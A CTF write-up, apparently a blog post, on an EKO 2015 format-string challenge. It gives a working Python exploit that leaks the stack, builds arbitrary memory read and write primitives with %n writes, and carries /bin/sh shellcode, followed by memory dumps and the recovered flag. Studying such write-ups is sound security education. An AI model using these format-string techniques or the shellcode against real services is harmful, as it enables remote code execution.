WTF?
this is not pwn task :(
binary getting with fsb seems incorrect.
just guessed the algorithm and got flag.
I can see stack. there is no ASLR....
root@ubuntu:~/tmp/eko# python stack.py
<Simple loop greetings v1.3.3.7>
[!] Type bye to quit
Enter your name:
stage1 start!
0xbffff754:(1th) -> 13370a97
0xbffff758:(2th) -> c
0xbffff75c:(3th) -> 1337070e
0xbffff760:(4th) -> 10
0xbffff764:(5th) -> 13370326
0xbffff768:(6th) -> 0
0xbffff76c:(7th) -> 25000000
0xbffff770:(8th) -> a782438
0xbffff774:(9th) -> 0
0xbffff778:(10th) -> 0
0xbffff77c:(11th) -> bcc80900
0xbffff780:(12th) -> 0
0xbffff784:(13th) -> b7fd1000
0xbffff788:(14th) -> bffff7a8
0xbffff78c:(15th) -> 13370985
0xbffff790:(16th) -> 13372080
0xbffff794:(17th) -> 13370ae3
0xbffff798:(18th) -> 133709ab
0xbffff79c:(19th) -> b7fd1000
0xbffff7a0:(20th) -> 133709a0
0xbffff7a4:(21th) -> 0
0xbffff7a8:(22th) -> 0
0xbffff7ac:(23th) -> b7e43a63
0xbffff7b0:(24th) -> 1
0xbffff7b4:(25th) -> bffff844
0xbffff7b8:(26th) -> bffff84c
first, grab binary from ELF base 0x13370000
then I can see all the logics.
but the flag generation logic seems wrong... (XOR 4 byte)
so, I control EIP and jump to flag printing part. but nothing :(
from socket import *
import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib
shell = "\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\x31\xC0\xB0\x0B\xCD\x80"
shell = "\xeb\xfe"
# common stuffs
p = lambda x: struct.pack("<L", x)
pq = lambda x: struct.pack("<Q", x)
ph = lambda x: struct.pack("<H", x)
pb = lambda x: struct.pack("<B", x)
def recv_until(s, pat):
msg = ''
while True:
msg += s.recv(1024)
if msg.find(pat) != -1:
break
return msg
def check_stack(s):
recv_until(s, 'name: ')
print '== stack dump =='
for i in xrange(1, 120):
payload = '%{0}$x'.format(i)
s.send(payload + '\n')
r = s.recv(1024).split('Hi ')[1].split('\n')[0]
print '{0}:({1}th) -> {2}'.format(hex(0xbffff750+4*i), i, r)
# lsb : 0~3, byte : 0~255
def make_pointer(s, lsb, byte):
recv_until(s, 'name: ')
payload = '%{0}c%26$hhn'.format(16+lsb)
s.send(payload + '\n') # 0xbffff910 at $63
recv_until(s, 'name: ')
payload = '%{0}c%63$hhn'.format(byte)
s.send(payload + '\n') # write lsb1 at $112
# overwrite a byte to pointer. MSB first!
def write_byte_to_pointer(s, byte):
recv_until(s, 'name: ')
payload = '%{0}c%112$n'.format(byte)
s.send(payload + '\n')
# LSB first.
def write_byte_where(s, addr, byte):
make_pointer(s, 3, ((addr&0xff000000) >> 24))
make_pointer(s, 2, ((addr&0x00ff0000) >> 16))
make_pointer(s, 1, ((addr&0x0000ff00) >> 8))
make_pointer(s, 0, ((addr&0x000000ff) >> 0))
write_byte_to_pointer(s, byte)
# write data into memory
def mem_write(s, addr, data):
i=0
for d in data:
print 'writing a byte {0}'.format(hex(ord(d)))
write_byte_where(s, addr + i, d)
i += 1
def mem_read(s, addr):
bin = ''
recv_until(s, 'name: ')
payload = 'A' + p(addr) + 'FG%8$s'
s.send(payload + '\n')
result = s.recv(8192)
result = result.split('FG')[1].split('Enter')[0]
result = result.replace('\n\n', '\x00')
bin += result.encode('hex')
return '{0}: {1}'.format(hex(addr), bin)
# pwn
s = socket(AF_INET, SOCK_STREAM)
s.connect( ('challs.ctf.site', 20002) )
# ret at 0xbffff78c
# $112 -> 0xbffff910 (target pointer location)
# argv at $26(0xbffff84c) points to $63(0xbffff96e)
# fflush.got : 0x1337201c (0xb7e8ce30)
# strcmp.got : 0x13372010
# overwrite strcmp.got at $112 (0x133708cc)
print mem_read(s, 0x13373008)
'''
print 'injecting shellcode at 0xbffff110...'
mem_write(s, 0xbffff310, shell)
print 'overwriting ret address...'
mem_write(s, 0xbffff78c, p(0xbffff110))
'''
# return.
print 'return!'
recv_until(s, 'name: ')
s.send('bye\n')
#check_stack(s)
t = telnetlib.Telnet()
t.sock = s
t.interact()
tried to get shell, but before doing that,
I just ignored the logic (xor until 4byte) and change the logic and got flag...
this is stupid task... :(
dumping 0x13372080
075b5403400f4c1ab20b0c0b04771e244c7942e72cb4bfa0407a797a320c68b932b7f062a7aca6e0686a6f542859a83dee9704939fcdf05b0a080b3e5fcd5faf00
dumping 0x13370ae3
336b305f70347274795f323031352100
"3k0_p4rty_2015!"
dumping 0x133720c1
7173271f1d4847 00
qs'HG
dumping 0x133720cc (encrypted flag)
560c0a1d67084218575c534f1a047221183a310549262c18091e1a705c6b00
3437666134363461336330303935316637383364643335303731333663323933623762353135396632333
V
3430645c303b3e6ecb543e3b35423f1727491d9718c6cbd91f48494b072d5bd202e88056d5d8dfbf5a5a5e61096ac30db1e730e1ebb4af693a393e1f
key (not real one, I just guessed to be like this by ignoring 4byte limit)
34376661343634613363303039353166373833646433353037313336633239336237623531353966323334346539316261366236376365326262646230653131
47fa464a3c00951f783dd3507136c293b7b5159f2344e91ba6b67ce2bbdb0e11
decrypt this(560c0a1d67084218575c534f1a047221183a310549262c18091e1a705c6b00) with key(34376661343634613363303039353166373833646433353037313336633239336237623531) then I get flag. I don't know why :(
EKO{b4by_3xpl0it_FMT_str1ng_FTW!#$}
'Games > CTF' 카테고리의 다른 글
| PlaidCTF 2015 RAM (0) | 2015.11.18 |
|---|---|
| 화이트햇 콘테스트 2015 한글 익스플로잇 분석 (6) | 2015.10.27 |
| DEFCON 2014 Final - wdub (0) | 2015.09.09 |
| MMA CTF 2015 SPELL (0) | 2015.09.08 |
| MMA CTF 2015 RPS (0) | 2015.09.08 |
